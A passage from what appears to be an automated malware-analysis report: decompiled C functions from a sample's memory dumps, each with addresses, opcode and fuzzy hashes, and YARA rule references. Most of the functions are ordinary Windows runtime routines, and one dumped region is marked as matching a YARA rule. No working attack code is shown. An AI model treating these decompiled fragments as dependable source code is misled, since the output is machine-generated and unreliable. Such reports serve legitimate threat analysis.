					_t7 =  *0x10d8724; // 0x0
					return E01098DF1(__ebx, 0xc0000374, 0x10d5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x010a2076
0x010a2078
0x010a207d
0x010a2083
0x010a20a4
0x010a20aa
0x010a20ac
0x010a20b7
0x010a20ba
0x010a20bc
0x010a20c9
0x010a20c9
0x010a20d0
0x010a20d2
0x00000000
0x010a20d2
0x010a20be
0x010a20c3
0x010a20c5
0x010a20c7
0x00000000
0x00000000
0x010a20c7
0x010a20bc
0x010a20d4
0x010a2085
0x010a2085
0x010a20a3
0x010a20a3

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a38701e1a23fafb0fee4b0af929c83f4e4d3747eff489b933bad380271e38f49
Instruction ID: 7241f948525987f1854d044cbff85fba13fd80abf92e2b1455ce5f2bc74055e0
Opcode Fuzzy Hash: a38701e1a23fafb0fee4b0af929c83f4e4d3747eff489b933bad380271e38f49
Instruction Fuzzy Hash: BBF0273A4131854ADF726BAC6111BE12FD2E756210F8A40D6ECD017206C5398883CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0102927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0102927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0102FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E010292C6(_t11, _t14);
				}
				return _t11;
			}

0x01029295
0x01029299
0x0102929f
0x010292aa
0x010292ad
0x010292ae
0x010292af
0x010292b0
0x010292b4
0x010292bb
0x010292bb
0x010292c5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 24e2646da8534e7862ece35de85f89b9dd6aec089d68fa2ddf4097b40c41a530
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: B5E02B323405116BE7119E09CC80F4737ADDF92724F054079F5005E282C6E5DC0C87A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100746D, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0100746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E00FFEB70(__ecx, 0x10d79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E010295D0();
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x0100746d
0x0100746d
0x0100746d
0x01007471
0x01007488
0x0104f92d
0x0100748e
0x01007491
0x01007495
0x0104f937
0x0104f93a
0x0104f94e
0x0104f953
0x0104f956
0x0104f956
0x01007495
0x00000000
0x01007488
0x01007473
0x01007478
0x0100747d
0x01007481
0x00000000
0x01007481
0x0100747d
0x0100747a
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5109c6bd335c10d5dcd50cd2cc2e95236c02363eb8bdbc2adbbe619e5bd78d2c
Instruction ID: 91dc36272f90182a37cb9643de35e6ce0229279c9f6603ece72dee60d53127d4
Opcode Fuzzy Hash: 5109c6bd335c10d5dcd50cd2cc2e95236c02363eb8bdbc2adbbe619e5bd78d2c
Instruction Fuzzy Hash: 2AF0B434508145AAEF479B6CC840BBDBFA1AF04254F0641A5D9D1AB1E1EB2CA800C785

Uniqueness

Uniqueness Score: -1.00%

Function 010B8CD6, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E010B8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x10dd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01007D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0102B640(E01029AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x010b8ce5
0x010b8ced
0x010b8cf0
0x010b8cfb
0x010b8d0d
0x010b8cfd
0x010b8d06
0x010b8d06
0x010b8d18
0x010b8d19
0x010b8d1b
0x010b8d20
0x010b8d33

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a3eac72fe5163bd165bf9e24a022e6d0a15f1fe5fdf2d0b7f8407d98fea5b21
Instruction ID: 42375a26982250988e05e7d9341984e7c544fa3a84ec9c8cc5a860d495188852
Opcode Fuzzy Hash: 1a3eac72fe5163bd165bf9e24a022e6d0a15f1fe5fdf2d0b7f8407d98fea5b21
Instruction Fuzzy Hash: F5F0A770A05619AFDB14EBB8D946EEE77B8EF19300F10419AF995EB3D0EA38D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 010B8B58, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E010B8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x10dd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01007D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0102B640(E01029AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x010b8b67
0x010b8b6f
0x010b8b72
0x010b8b7d
0x010b8b8f
0x010b8b7f
0x010b8b88
0x010b8b88
0x010b8b9a
0x010b8b9b
0x010b8b9d
0x010b8ba2
0x010b8bb5

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1720d3d4525b1b6fa5742ff095e57651c8df3c55f9d2b1b13e870b8c6d004e8c
Instruction ID: a6faadbd57ef7fb50670eae036294ff7c7007aba5001f132894e51c4bea0a7b5
Opcode Fuzzy Hash: 1720d3d4525b1b6fa5742ff095e57651c8df3c55f9d2b1b13e870b8c6d004e8c
Instruction Fuzzy Hash: 74F082B0A04259ABDB14EBB8D946EAE77B8EF04300F044499FA85DB3D0EA34D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4F2E, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E010B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0100C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xfc1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x00fe4f2e
0x00fe4f34
0x00fe4f38
0x01040b85
0x01040b85
0x01040b89
0x01040b9a
0x01040b9a
0x01040b9f
0x00000000
0x01040b9f
0x01040b94
0x01040b98
0x00000000
0x00000000
0x00000000
0x01040b98
0x00fe4f3e
0x00fe4f48
0x00000000
0x00fe4f6e
0x00000000
0x00fe4f70

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c829ad8ed4b692cc7aa440940de360ad8b7fdf45548a889aa15694630ad7188
Instruction ID: df3ff63954fb1022d83d418faa8393b6529ca7b83163673e07e142f028a1dd3e
Opcode Fuzzy Hash: 9c829ad8ed4b692cc7aa440940de360ad8b7fdf45548a889aa15694630ad7188
Instruction Fuzzy Hash: 0BF0B4B65216858FE7B2EB1CC1C4B9277D8AB00774F44C4B5E68597526C724E880C688

Uniqueness

Uniqueness Score: -1.00%

Function 0101A44B, Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x10d7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0102FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x0101a44b
0x0101a453
0x0101a472
0x0101a476
0x00000000
0x0101a493
0x0101a47a
0x0101a47f
0x0101a486
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e27039869a352bf9f1e5abc807d64f35b08302d18ae1e0ce86797b4e47931e63
Instruction ID: d7ddfdbe78e06edff33590bb3a36c845468d8ff41a5107ef6cfe3b6f9c3c74de
Opcode Fuzzy Hash: e27039869a352bf9f1e5abc807d64f35b08302d18ae1e0ce86797b4e47931e63
Instruction Fuzzy Hash: 4FE09272B42422ABD2225A18AC00FA773ADDBE8A55F094035EA84C7254DA68DD01C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FEF358, Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00FEF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0101F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01004620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x00fef35d
0x00fef361
0x00fef367
0x00fef372
0x00fef38c
0x00fef38c
0x00fef394

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: f69d4d3c020dbe8c5f5fe20ca009328a09ba2fdf292261f78c8fd600201fa77b
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 52E0D832A40158FFDB2196D99E05F9ABBACDB58B60F0041A6B904D71D0D5659D00D2D0

Uniqueness

Uniqueness Score: -1.00%

Function 00FFFF60, Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FFFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xfc11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E010B88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01000050(_t14);
				}
			}

0x00ffff66
0x00ffff6b
0x00000000
0x00ffff8f
0x00000000
0x00ffff8f

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91dc7ae64439b1b9be5dcfc27a3e090c8845515a1f30cce91dab3d8e4e01c57d
Instruction ID: b3761a9ecd629b934c321f8963391d4d7a3bdf37edd4ecf65652e4f81db3e9ed
Opcode Fuzzy Hash: 91dc7ae64439b1b9be5dcfc27a3e090c8845515a1f30cce91dab3d8e4e01c57d
Instruction Fuzzy Hash: 74E0DFB1A052089FD734DF52D980F75379CAF62731F19862EF2084B1A6C621DC84E606

Uniqueness

Uniqueness Score: -1.00%

Function 010741E8, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x10c08f0);
				_t5 = E0103D08C(__ebx, __edi, __esi);
				if( *0x10d87ec == 0) {
					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x10d87ec == 0) {
						 *0x10d87f0 = 0x10d87ec;
						 *0x10d87ec = 0x10d87ec;
						 *0x10d87e8 = 0x10d87e4;
						 *0x10d87e4 = 0x10d87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01074248();
				}
				return E0103D0D1(_t5);
			}

0x010741e8
0x010741ea
0x010741ef
0x010741fb
0x01074206
0x0107420b
0x01074216
0x0107421d
0x01074222
0x0107422c
0x01074231
0x01074231
0x01074236
0x0107423d
0x0107423d
0x01074247

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ccf98ab9d9605ec21c0358e418ebe7c841e0b763ff753935af49b5a2856e7
Instruction ID: 1820e2bbd2df8c7f0db74ff620e62e1d83c2dc1a4b1b11d10eb9a65e7cf79ee7
Opcode Fuzzy Hash: 039ccf98ab9d9605ec21c0358e418ebe7c841e0b763ff753935af49b5a2856e7
Instruction Fuzzy Hash: 47F01578912742EECBB2EFA9D50075836E4FB84710F82C19BF5C087298C73984A5CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0109D380, Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0109D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00FEE8B0(__ecx, _a4, 0xfff);
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0109d38a
0x0109d39b
0x0109d3b1
0x00000000
0x0109d3b6
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 2c975c4e774fc1c066c1e10e60f3aa6e45f462522f393b71fd87dc072145fc8d
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: 58E0C231280244FBEF225E84CC10FB97B56EB507A1F108031FE885A691C679AD91E7C4

Uniqueness

Uniqueness Score: -1.00%

Function 0101A185, Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x10d67e4 >= 0xa) {
					if(_t5 < 0x10d6800 || _t5 >= 0x10d6900) {
						return L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01000010(0x10d67e0, _t5);
				}
			}

0x0101a190
0x0101a1a6
0x0101a1c2
0x00000000
0x00000000
0x00000000
0x0101a192
0x0101a192
0x0101a19f
0x0101a19f

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
Instruction ID: f52bb6777c0b05c998493fd49a79d86499281b05b16cbee34587e6a72d3c2621
Opcode Fuzzy Hash: 05ee77f1d7c1d1e1bbe5a72190a35d4279585ab0430b9cf275c9b5756d9933be
Instruction Fuzzy Hash: 00D02E713231809AD72E6300C824BE23222F7807A0F34084CF2C70B9EAEA6A88D48208

Uniqueness

Uniqueness Score: -1.00%

Function 0040E44A, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7723dcfc7c81f8c5e618a5b9cdffa972d217e008d84f1d58c973e5c63153e91
Instruction ID: fc454177d0078add2389935985a6aabb5b3127401f90915b186452e8e3c50aa5
Opcode Fuzzy Hash: a7723dcfc7c81f8c5e618a5b9cdffa972d217e008d84f1d58c973e5c63153e91
Instruction Fuzzy Hash: CFB0928BBC54182A44302C4A79512BEEBA5E2C38B2A6063A6DE0CB3201044AC82214E8

Uniqueness

Uniqueness Score: -1.00%

Function 010116E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010116E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01011710(0x10d67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01004620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x010116e8
0x010116ef
0x010116f3
0x010116fe
0x00000000
0x01011700
0x0101170d
0x0101170d
0x010116f2
0x010116f2
0x010116f2
0x010116f2

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
Instruction ID: d2b6cb89635b822ce54cdc9b57bcff546efd2197e3399a6e2740390740dc7722
Opcode Fuzzy Hash: 8d2cf1478fa19338410d576e789cf1f650abe18d5193b7622d0655869b6acfb2
Instruction Fuzzy Hash: 29D0A731200202A2EA2E5B24AC14B142691FB94781F38049CF347494C1DFBACC93E04C

Uniqueness

Uniqueness Score: -1.00%

Function 010653CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010653CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E00FFEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x010653ca
0x010653ce
0x010653d9
0x010653de
0x010653e1
0x010653e1
0x010653e6
0x010653f3
0x00000000
0x010653f8
0x010653fb

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 54f4a268f7b06ffecd70a0f352bf28e235b80857551660602096ffcc3f03bb18
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: A0E0EC719446849BDF12DB59CA50F5EBBF9FB84B80F154454A5885F671C668AD00CB40

Uniqueness

Uniqueness Score: -1.00%

Function 010135A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010135A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E00FFEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x010135a1
0x010135a1
0x010135a5
0x010135ab
0x010135ab
0x010135b5
0x00000000
0x010135c1
0x010135b7

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: d075dba85ec1bbb88db7e62d23767e341103b701db8fcd05836f59114e30a6d7
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: 24D0A9314011849EEB82AB14C2187ACBBB3BF00A28F5820A5D2820E86EC33E4A1AD600

Uniqueness

Uniqueness Score: -1.00%

Function 00FFAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FFAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x00ffaab6
0x00ffaabb
0x0104a442
0x00000000
0x0104a448
0x0104a454
0x0104a454
0x00ffaac1
0x00ffaac1
0x00ffaac6
0x00ffaac6

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 104ba51aec92819027652f42a388b6d7fe0d2781b364adb1bc016b672f9eb4e1
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: 82D0E975352980CFD657CB1DC594B1573A4BF44B44FC504E0E945CB762E62CDD44CA10

Uniqueness

Uniqueness Score: -1.00%

Function 0106A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0106A537(intOrPtr _a4, intOrPtr _a8) {

				return L01008E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0106a553

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: fd4fcb868c7a4a8fbe4c48abf885243a28a3a6bd4f43e7b91f5e0fac999d53b0
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: FFC01232080688BBCB126E81CC00F467B2AFBA4B60F008011BA480A5A0C632E9B0EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L01004620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x00fedb4d
0x00fedb54
0x00fedb5f
0x00fedb56
0x00fedb56
0x00fedb5c
0x00fedb5c

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 410e2f3803098ab7d73e62c28712c78d5bf5ca9450410403cc2e139f97dca13b
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: D2C08C30290A41AAEB221F20CE01B4036A1BB50B01F4500A06300DA4F0EBB8DC01E600

Uniqueness

Uniqueness Score: -1.00%

Function 00FEAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FEAD30(intOrPtr _a4) {

				return L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x00fead49

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 99e87521ff6328d94fffe156e0663d8aa177b68c779b5967b3666208af0518d2
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 5DC08C32080248BBC7126A45CD00F017B29E7A0BA0F000020F6480A6A2C936E860D588

Uniqueness

Uniqueness Score: -1.00%

Function 00FF76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FF76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x00ff76e4
0x00000000
0x00ff76f8
0x00ff76fd

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: b0e063dc66b58c219ae2558735fc5b580bf6d3e25caa4bc21e287a0e000a9a10
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 4AC08C70545ACC5AEB2A6708CE20B707650BF18718F4801BCAB85894F2D36CBC02D248

Uniqueness

Uniqueness Score: -1.00%

Function 01003A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01003A1C(intOrPtr _a4) {
				void* _t5;

				return L01004620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x01003a35

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: b0ba6b8d60a45c0da10fedb81b035ddddf7f94e8f0236a0b7259fabf3b7116af
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: A8C08C32080648BBC7126E41DD00F017B29E7A4B60F000020B7040A5A0C572EC60D58C

Uniqueness

Uniqueness Score: -1.00%

Function 010136CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010136CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
